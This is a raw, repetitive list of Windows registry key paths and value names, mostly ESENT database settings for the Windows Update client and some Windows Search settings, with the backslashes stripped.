HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionWindowsUpdate “ResetDataStoreReason”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltOSSLV “Space Grant Size (B)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalOSSLV “Space Grant Size (B)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltOSSLV “EA List Time-To-Live (ms)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalOSSLV “EA List Time-To-Live (ms)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “SystemPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “SystemPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “TempPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “TempPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFilePath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFilePath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFileFailoverPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFileFailoverPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BaseName”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BaseName”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxSessions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxSessions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PreferredMaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PreferredMaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxCursors”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxCursors”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “GlobalMinVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “GlobalMinVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PreferredVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PreferredVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxTemporaryTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxTemporaryTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFileSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFileSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogBuffers”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogBuffers”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogCheckpointPeriod”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogCheckpointPeriod”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CommitDefault”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CommitDefault”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CircularLog”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CircularLog”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “DbExtensionSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “DbExtensionSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageTempDBMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageTempDBMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageFragment”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageFragment”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “VERTasksPostMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “VERTasksPostMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CacheSizeMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CacheSizeMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CacheSizeMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CacheSizeMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CheckpointDepthMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CheckpointDepthMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKCorrInterval”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKCorrInterval”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKHistoryMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKHistoryMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKPolicy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKPolicy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “StartFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “StartFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “StopFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “StopFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “ExceptionAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “ExceptionAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EventLogCache”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EventLogCache”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “Recovery”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “Recovery”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableOnlineDefrag”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableOnlineDefrag”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “AssertAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “AssertAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “RFS2IOsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “RFS2IOsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “RFS2AllocsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “RFS2AllocsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CheckFormatWhenOpenFail”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CheckFormatWhenOpenFail”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableIndexChecking”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableIndexChecking”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableTempTableVersioning”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableTempTableVersioning”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “ZeroDatabaseDuringBackup”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “ZeroDatabaseDuringBackup”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “IgnoreLogVersion”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “IgnoreLogVersion”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “DeleteOldLogs”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “DeleteOldLogs”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableImprovedSeekShortcut”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableImprovedSeekShortcut”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BackupChunkSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BackupChunkSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BackupOutstandingReads”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BackupOutstandingReads”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CreatePathIfNotExist”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CreatePathIfNotExist”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageHintCacheSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageHintCacheSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltCache Manager “Enable RO Cache Image”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalCache Manager “Enable RO Cache Image”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltCache Manager “Enable Opportune Writes”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalCache Manager “Enable Opportune Writes”
“GlobalFlags”
“Columns”
“Level”
“Flags”
“LogDir”
“LogFile”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltDEBUG “Trace Level”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalDEBUG “Trace Level”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionWindowsUpdate “ResetDataStoreReason”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltOSSLV “Space Grant Size (B)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalOSSLV “Space Grant Size (B)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltOSSLV “EA List Time-To-Live (ms)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalOSSLV “EA List Time-To-Live (ms)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “SystemPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “SystemPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “TempPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “TempPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFilePath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFilePath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFileFailoverPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFileFailoverPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BaseName”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BaseName”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxSessions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxSessions”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PreferredMaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PreferredMaxOpenTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxCursors”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxCursors”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “GlobalMinVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “GlobalMinVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PreferredVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PreferredVerPages”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “MaxTemporaryTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “MaxTemporaryTables”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFileSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFileSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogBuffers”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogBuffers”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogCheckpointPeriod”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogCheckpointPeriod”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CommitDefault”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CommitDefault”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CircularLog”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CircularLog”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “DbExtensionSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “DbExtensionSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageTempDBMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageTempDBMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageFragment”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageFragment”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “VERTasksPostMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “VERTasksPostMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CacheSizeMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CacheSizeMin”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CacheSizeMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CacheSizeMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CheckpointDepthMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CheckpointDepthMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKCorrInterval”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKCorrInterval”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKHistoryMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKHistoryMax”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKPolicy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKPolicy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LRUKTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LRUKTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “StartFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “StartFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “StopFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “StopFlushThreshold”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “ExceptionAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “ExceptionAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EventLogCache”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EventLogCache”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “Recovery”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “Recovery”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableOnlineDefrag”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableOnlineDefrag”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “AssertAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “AssertAction”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “RFS2IOsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “RFS2IOsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “RFS2AllocsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “RFS2AllocsPermitted”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CheckFormatWhenOpenFail”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CheckFormatWhenOpenFail”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableIndexChecking”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableIndexChecking”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableTempTableVersioning”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableTempTableVersioning”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “ZeroDatabaseDuringBackup”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “ZeroDatabaseDuringBackup”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “IgnoreLogVersion”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “IgnoreLogVersion”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “DeleteOldLogs”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “DeleteOldLogs”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “EnableImprovedSeekShortcut”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “EnableImprovedSeekShortcut”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BackupChunkSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BackupChunkSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “BackupOutstandingReads”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “BackupOutstandingReads”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “CreatePathIfNotExist”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “CreatePathIfNotExist”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “PageHintCacheSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “PageHintCacheSize”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltCache Manager “Enable RO Cache Image”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalCache Manager “Enable RO Cache Image”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltCache Manager “Enable Opportune Writes”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalCache Manager “Enable Opportune Writes”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionNetwork “UID”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “BackoffOnUserActivityInterval1”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “BackoffOnUserActivityInterval2”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “DebugFilters”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “ObsoleteTempFilesAge”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “FilterDaemonMsToIdle”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “ConnectTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “DataTimeout”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “UseProxy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “LocalByPassProxy”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “PortNumber”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “ProxyName”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “ByPassList”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlersFile “ProgID”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlersFile “Prefix”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlers “Mapi”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGatherWindowsSystemIndexProtocolsMapi “LogLevel.MAPI”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsWindows SearchPreferences “PreventIndexingOutlook”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlers “OutlookExpress”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchProtocolHandlers “OTFS”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGatherWindowsSystemIndexProtocolsMapi “LogLevel.UNCFATPHLog”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “MaxGrowFactor”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “PerformanceLevel”
HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionNetwork “UID”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows SearchGathering Manager “MaxMSinFilter”
“GlobalFlags”
“Columns”
“Level”
“Flags”
“LogDir”
“LogFile”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltDEBUG “Trace Level”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalDEBUG “Trace Level”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionWindowsUpdate “ResetDataStoreReason”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltOSSLV “Space Grant Size (B)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalOSSLV “Space Grant Size (B)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltOSSLV “EA List Time-To-Live (ms)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalOSSLV “EA List Time-To-Live (ms)”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “SystemPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “SystemPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “TempPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “TempPath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFilePath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTGlobalSystem Parameter Overrides “LogFilePath”
HKEY_LOCAL_MACHINESOFTWAREMicrosoftESENTProcesswuaucltSystem Parameter Overrides “LogFileFailoverPath”
